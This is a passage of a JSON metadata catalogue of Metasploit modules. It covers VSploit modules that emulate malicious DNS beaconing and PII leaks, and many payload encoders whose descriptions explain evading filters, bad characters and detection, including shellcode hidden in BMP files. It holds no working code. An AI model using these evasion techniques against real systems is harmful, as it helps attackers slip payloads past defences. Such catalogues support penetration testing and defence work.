"MJC"
],
"description": "This module takes a list and emulates malicious DNS beaconing.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/vsploit/malware/dns/dns_query.rb",
"is_install_path": true,
"ref_name": "vsploit/malware/dns/dns_query",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_vsploit/malware/dns/dns_zeus": {
"name": "VSploit Zeus DNS Query Module",
"full_name": "auxiliary/vsploit/malware/dns/dns_zeus",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MJC"
],
"description": "This module queries known Zeus Botnet DNS records.",
"references": [
"URL-https://zeustracker.abuse.ch/blocklist.php?download=domainblocklist"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb",
"is_install_path": true,
"ref_name": "vsploit/malware/dns/dns_zeus",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_vsploit/pii/email_pii": {
"name": "VSploit Email PII",
"full_name": "auxiliary/vsploit/pii/email_pii",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"willis"
],
"description": "This auxiliary module reads data from a file and sends it, through an internal or\n external SMTP server, as content that should be flagged.",
"references": [
],
"platform": "",
"arch": "",
"rport": "25",
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/vsploit/pii/email_pii.rb",
"is_install_path": true,
"ref_name": "vsploit/pii/email_pii",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_vsploit/pii/web_pii": {
"name": "VSploit Web PII",
"full_name": "auxiliary/vsploit/pii/web_pii",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MJC"
],
"description": "This module emulates a web server that leaks PII data.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2011/06/02/vsploit--virtualizing-exploitation-attributes-with-metasploit-framework"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/vsploit/pii/web_pii.rb",
"is_install_path": true,
"ref_name": "vsploit/pii/web_pii",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/brace": {
"name": "Bash Brace Expansion Command Encoder",
"full_name": "encoder/cmd/brace",
"rank": 100,
"disclosure_date": null,
"type": "encoder",
"author": [
"wvu <wvu@metasploit.com>",
"egypt <egypt@metasploit.com>"
],
"description": "This encoder uses brace expansion in Bash and other shells\n to avoid whitespace without being overly fancy.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-23 15:20:56 +0000",
"path": "/modules/encoders/cmd/brace.rb",
"is_install_path": true,
"ref_name": "cmd/brace",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/echo": {
"name": "Echo Command Encoder",
"full_name": "encoder/cmd/echo",
"rank": 400,
"disclosure_date": null,
"type": "encoder",
"author": [
"hdm <x@hdm.io>"
],
"description": "This encoder uses echo and backslash escapes to avoid commonly restricted characters.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/cmd/echo.rb",
"is_install_path": true,
"ref_name": "cmd/echo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/generic_sh": {
"name": "Generic Shell Variable Substitution Command Encoder",
"full_name": "encoder/cmd/generic_sh",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"hdm <x@hdm.io>"
],
"description": "This encoder uses standard Bourne shell variable substitution\n tricks to avoid commonly restricted characters.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/cmd/generic_sh.rb",
"is_install_path": true,
"ref_name": "cmd/generic_sh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/ifs": {
"name": "Bourne ${IFS} Substitution Command Encoder",
"full_name": "encoder/cmd/ifs",
"rank": 100,
"disclosure_date": null,
"type": "encoder",
"author": [
"egypt <egypt@metasploit.com>",
"wvu <wvu@metasploit.com>"
],
"description": "This encoder uses Bourne ${IFS} substitution to avoid whitespace\n without being overly fancy.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-23 15:20:38 +0000",
"path": "/modules/encoders/cmd/ifs.rb",
"is_install_path": true,
"ref_name": "cmd/ifs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/perl": {
"name": "Perl Command Encoder",
"full_name": "encoder/cmd/perl",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"hdm <x@hdm.io>"
],
"description": "This encoder uses perl to avoid commonly restricted characters.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/cmd/perl.rb",
"is_install_path": true,
"ref_name": "cmd/perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/powershell_base64": {
"name": "Powershell Base64 Command Encoder",
"full_name": "encoder/cmd/powershell_base64",
"rank": 600,
"disclosure_date": null,
"type": "encoder",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This encoder encodes the command as a Base64-encoded command for PowerShell.",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/cmd/powershell_base64.rb",
"is_install_path": true,
"ref_name": "cmd/powershell_base64",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_cmd/printf_php_mq": {
"name": "printf(1) via PHP magic_quotes Utility Command Encoder",
"full_name": "encoder/cmd/printf_php_mq",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This encoder uses the printf(1) utility to avoid restricted\n characters. Some shell variable substitution may also be used\n if needed symbols are blacklisted. Some characters are intentionally\n left unescaped since it is assumed that PHP with magic_quotes_gpc\n enabled will escape them during request handling.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/encoders/cmd/printf_php_mq.rb",
"is_install_path": true,
"ref_name": "cmd/printf_php_mq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_generic/eicar": {
"name": "The EICAR Encoder",
"full_name": "encoder/generic/eicar",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This encoder merely replaces the given payload with the EICAR test string.\n Note, this is sure to ruin your payload.\n\n Any content-aware firewall, proxy, IDS, or IPS that follows anti-virus\n standards should alert and do what it would normally do when malware is\n transmitted across the wire.",
"references": [
],
"platform": "All",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/generic/eicar.rb",
"is_install_path": true,
"ref_name": "generic/eicar",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_generic/none": {
"name": "The \"none\" Encoder",
"full_name": "encoder/generic/none",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This \"encoder\" does not transform the payload in any way.",
"references": [
],
"platform": "All",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/generic/none.rb",
"is_install_path": true,
"ref_name": "generic/none",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_mipsbe/byte_xori": {
"name": "Byte XORi Encoder",
"full_name": "encoder/mipsbe/byte_xori",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"Julien Tinnes <julien@cr0.org>",
"juan vazquez <juan.vazquez@metasploit.com>",
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "MIPS web-server-exploit-friendly XOR encoder. This encoder has been found useful in\n situations where '&' (0x26) is a bad character. Since 0x26 is the XOR opcode on MIPS\n architectures, this one is based on the XORI instruction.",
"references": [
],
"platform": "All",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-18 16:33:44 +0000",
"path": "/modules/encoders/mipsbe/byte_xori.rb",
"is_install_path": true,
"ref_name": "mipsbe/byte_xori",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_mipsbe/longxor": {
"name": "XOR Encoder",
"full_name": "encoder/mipsbe/longxor",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"Julien Tinnes <julien@cr0.org>",
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "MIPS web-server-exploit-friendly XOR encoder.",
"references": [
],
"platform": "All",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-18 13:35:16 +0000",
"path": "/modules/encoders/mipsbe/longxor.rb",
"is_install_path": true,
"ref_name": "mipsbe/longxor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_mipsle/byte_xori": {
"name": "Byte XORi Encoder",
"full_name": "encoder/mipsle/byte_xori",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"Julien Tinnes <julien@cr0.org>",
"juan vazquez <juan.vazquez@metasploit.com>",
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "MIPS web-server-exploit-friendly XOR encoder. This encoder has been found useful in\n situations where '&' (0x26) is a bad character. Since 0x26 is the XOR opcode on MIPS\n architectures, this one is based on the XORI instruction.",
"references": [
],
"platform": "All",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-18 16:30:47 +0000",
"path": "/modules/encoders/mipsle/byte_xori.rb",
"is_install_path": true,
"ref_name": "mipsle/byte_xori",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_mipsle/longxor": {
"name": "XOR Encoder",
"full_name": "encoder/mipsle/longxor",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"Julien Tinnes <julien@cr0.org>",
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "MIPS web-server-exploit-friendly XOR encoder.",
"references": [
],
"platform": "All",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-18 15:48:29 +0000",
"path": "/modules/encoders/mipsle/longxor.rb",
"is_install_path": true,
"ref_name": "mipsle/longxor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_php/base64": {
"name": "PHP Base64 Encoder",
"full_name": "encoder/php/base64",
"rank": 500,
"disclosure_date": null,
"type": "encoder",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "This encoder returns a base64 string encapsulated in\n eval(base64_decode()), increasing the size by a bit more than\n one third.",
"references": [
],
"platform": "All",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-07-12 17:59:12 +0000",
"path": "/modules/encoders/php/base64.rb",
"is_install_path": true,
"ref_name": "php/base64",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_ppc/longxor": {
"name": "PPC LongXOR Encoder",
"full_name": "encoder/ppc/longxor",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This encoder is ghandi's PPC dword xor encoder with some size tweaks\n by HDM.",
"references": [
],
"platform": "All",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/ppc/longxor.rb",
"is_install_path": true,
"ref_name": "ppc/longxor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_ppc/longxor_tag": {
"name": "PPC LongXOR Encoder",
"full_name": "encoder/ppc/longxor_tag",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This encoder is ghandi's PPC dword xor encoder but uses a tag-based\n terminator rather than a length.",
"references": [
],
"platform": "All",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/ppc/longxor_tag.rb",
"is_install_path": true,
"ref_name": "ppc/longxor_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_ruby/base64": {
"name": "Ruby Base64 Encoder",
"full_name": "encoder/ruby/base64",
"rank": 500,
"disclosure_date": null,
"type": "encoder",
"author": [
"Robin Stenvi <robin.stenvi@gmail.com>"
],
"description": "This encoder returns a base64 string encapsulated in\n eval(%(base64 encoded string).unpack(%(m0)).first).",
"references": [
],
"platform": "All",
"arch": "ruby",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-04-24 18:33:27 +0000",
"path": "/modules/encoders/ruby/base64.rb",
"is_install_path": true,
"ref_name": "ruby/base64",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_sparc/longxor_tag": {
"name": "SPARC DWORD XOR Encoder",
"full_name": "encoder/sparc/longxor_tag",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"optyx <optyx@no$email.com>",
"hdm <x@hdm.io>"
],
"description": "This encoder is optyx's 48-byte SPARC encoder with some tweaks.",
"references": [
],
"platform": "All",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/sparc/longxor_tag.rb",
"is_install_path": true,
"ref_name": "sparc/longxor_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x64/xor": {
"name": "XOR Encoder",
"full_name": "encoder/x64/xor",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "An x64 XOR encoder. Uses an 8 byte key and takes advantage of x64 relative addressing.",
"references": [
],
"platform": "All",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x64/xor.rb",
"is_install_path": true,
"ref_name": "x64/xor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x64/xor_dynamic": {
"name": "Dynamic key XOR Encoder",
"full_name": "encoder/x64/xor_dynamic",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"lupman",
"phra"
],
"description": "An x64 XOR encoder with dynamic key size",
"references": [
],
"platform": "All",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-15 01:02:13 +0000",
"path": "/modules/encoders/x64/xor_dynamic.rb",
"is_install_path": true,
"ref_name": "x64/xor_dynamic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x64/zutto_dekiru": {
"name": "Zutto Dekiru",
"full_name": "encoder/x64/zutto_dekiru",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"agix"
],
"description": "Inspired by shikata_ga_nai using fxsave64 to work under x64 systems.",
"references": [
],
"platform": "All",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x64/zutto_dekiru.rb",
"is_install_path": true,
"ref_name": "x64/zutto_dekiru",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/add_sub": {
"name": "Add/Sub Encoder",
"full_name": "encoder/x86/add_sub",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"Melih Sarica <ms@sevure.com>"
],
"description": "Encodes payload with add or sub instructions. This idea came\n from (offensive-security) muts' hp nnm 7.5.1 exploit.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/add_sub.rb",
"is_install_path": true,
"ref_name": "x86/add_sub",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/alpha_mixed": {
"name": "Alpha2 Alphanumeric Mixedcase Encoder",
"full_name": "encoder/x86/alpha_mixed",
"rank": 100,
"disclosure_date": null,
"type": "encoder",
"author": [
"pusscat <pusscat@metasploit.com>",
"skylined <skylined@edup.tudelft.nl>"
],
"description": "Encodes payloads as alphanumeric mixedcase text. This encoder uses\n SkyLined's Alpha2 encoding suite.\n A pure alpha encoder is impossible without having a register that points at or near the shellcode.\n In a default configuration the first few bytes at the beginning are an fnstenv getpc stub (the same as used in shikata_ga_nai) and thus are not alphanumeric.\n You can set BufferRegister for full alpha (see Encoder options for details).",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/alpha_mixed.rb",
"is_install_path": true,
"ref_name": "x86/alpha_mixed",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/alpha_upper": {
"name": "Alpha2 Alphanumeric Uppercase Encoder",
"full_name": "encoder/x86/alpha_upper",
"rank": 100,
"disclosure_date": null,
"type": "encoder",
"author": [
"pusscat <pusscat@metasploit.com>",
"skylined <skylined@edup.tudelft.nl>"
],
"description": "Encodes payloads as alphanumeric uppercase text. This encoder uses\n SkyLined's Alpha2 encoding suite.\n A pure alpha encoder is impossible without having a register that points at or near the shellcode.\n In a default configuration the first few bytes at the beginning are an fnstenv getpc stub (the same as used in shikata_ga_nai) and thus are not alphanumeric.\n You can set BufferRegister for full alpha (see Encoder options for details).",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/alpha_upper.rb",
"is_install_path": true,
"ref_name": "x86/alpha_upper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/avoid_underscore_tolower": {
"name": "Avoid underscore/tolower",
"full_name": "encoder/x86/avoid_underscore_tolower",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"skape <mmiller@hick.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Underscore/tolower Safe Encoder used to exploit CVE-2012-2329. It is a\n modified version of the 'Avoid UTF8/tolower' encoder by skape. Please check\n the documentation of the skape encoder before using it. Like the original,\n this encoder expects ECX pointing to the start of the encoded payload. Also\n BufferOffset must be provided if needed.\n\n The changes introduced are (1) avoid the use of the 0x5f byte (underscore)\n because it is a badchar in the CVE-2012-2329 case and (2) optimize the\n transformation block, taking into account more relaxed conditions about bad\n characters greater than 0x80.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/avoid_underscore_tolower.rb",
"is_install_path": true,
"ref_name": "x86/avoid_underscore_tolower",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/avoid_utf8_tolower": {
"name": "Avoid UTF8/tolower",
"full_name": "encoder/x86/avoid_utf8_tolower",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"skape <mmiller@hick.org>"
],
"description": "UTF8 Safe, tolower Safe Encoder",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/avoid_utf8_tolower.rb",
"is_install_path": true,
"ref_name": "x86/avoid_utf8_tolower",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/bloxor": {
"name": "BloXor - A Metamorphic Block Based XOR Encoder",
"full_name": "encoder/x86/bloxor",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "A Metamorphic Block Based XOR Encoder.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/bloxor.rb",
"is_install_path": true,
"ref_name": "x86/bloxor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/bmp_polyglot": {
"name": "BMP Polyglot",
"full_name": "encoder/x86/bmp_polyglot",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"Spencer McIntyre"
],
"description": "Encodes a payload in such a way that the resulting binary blob is both\n valid x86 shellcode and a valid bitmap image file (.bmp). The selected\n bitmap file to inject into must use the BM (Windows 3.1x/95/NT) header\n and the 40-byte Windows 3.1x/NT BITMAPINFOHEADER. Additionally the file\n must use either 24 or 32 bits per pixel as the color depth and no\n compression. This encoder makes absolutely no effort to remove any\n invalid characters.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/bmp_polyglot.rb",
"is_install_path": true,
"ref_name": "x86/bmp_polyglot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/call4_dword_xor": {
"name": "Call+4 Dword XOR Encoder",
"full_name": "encoder/x86/call4_dword_xor",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"hdm <x@hdm.io>",
"spoonm <spoonm@no$email.com>"
],
"description": "Call+4 Dword XOR Encoder",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/call4_dword_xor.rb",
"is_install_path": true,
"ref_name": "x86/call4_dword_xor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/context_cpuid": {
"name": "CPUID-based Context Keyed Payload Encoder",
"full_name": "encoder/x86/context_cpuid",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"Dimitris Glynos"
],
"description": "This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/context_cpuid.rb",
"is_install_path": true,
"ref_name": "x86/context_cpuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/context_stat": {
"name": "stat(2)-based Context Keyed Payload Encoder",
"full_name": "encoder/x86/context_stat",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"Dimitris Glynos"
],
"description": "This is a Context-Keyed Payload Encoder based on stat(2)\n and Shikata Ga Nai.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/context_stat.rb",
"is_install_path": true,
"ref_name": "x86/context_stat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/context_time": {
"name": "time(2)-based Context Keyed Payload Encoder",
"full_name": "encoder/x86/context_time",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"Dimitris Glynos"
],
"description": "This is a Context-Keyed Payload Encoder based on time(2)\n and Shikata Ga Nai.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/context_time.rb",
"is_install_path": true,
"ref_name": "x86/context_time",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/countdown": {
"name": "Single-byte XOR Countdown Encoder",
"full_name": "encoder/x86/countdown",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "This encoder uses the length of the payload as a position-dependent\n encoder key to produce a small decoder stub.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-09-01 02:40:26 +0000",
"path": "/modules/encoders/x86/countdown.rb",
"is_install_path": true,
"ref_name": "x86/countdown",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/fnstenv_mov": {
"name": "Variable-length Fnstenv/mov Dword XOR Encoder",
"full_name": "encoder/x86/fnstenv_mov",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This encoder uses a variable-length mov equivalent instruction\n with fnstenv for getip.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/fnstenv_mov.rb",
"is_install_path": true,
"ref_name": "x86/fnstenv_mov",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/jmp_call_additive": {
"name": "Jump/Call XOR Additive Feedback Encoder",
"full_name": "encoder/x86/jmp_call_additive",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Jump/Call XOR Additive Feedback",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/jmp_call_additive.rb",
"is_install_path": true,
"ref_name": "x86/jmp_call_additive",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/nonalpha": {
"name": "Non-Alpha Encoder",
"full_name": "encoder/x86/nonalpha",
"rank": 100,
"disclosure_date": null,
"type": "encoder",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "Encodes payloads as non-alpha based bytes. This allows\n payloads to bypass both toupper() and tolower() calls,\n but will fail isalpha(). Table based design from\n Russel Sanford.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-30 01:22:24 +0000",
"path": "/modules/encoders/x86/nonalpha.rb",
"is_install_path": true,
"ref_name": "x86/nonalpha",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/nonupper": {
"name": "Non-Upper Encoder",
"full_name": "encoder/x86/nonupper",
"rank": 100,
"disclosure_date": null,
"type": "encoder",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "Encodes payloads as non-alpha based bytes. This allows\n payloads to bypass tolower() calls, but will fail isalpha().\n Table based design from Russel Sanford.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/nonupper.rb",
"is_install_path": true,
"ref_name": "x86/nonupper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/opt_sub": {
"name": "Sub Encoder (optimised)",
"full_name": "encoder/x86/opt_sub",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"OJ Reeves <oj@buffered.io>"
],
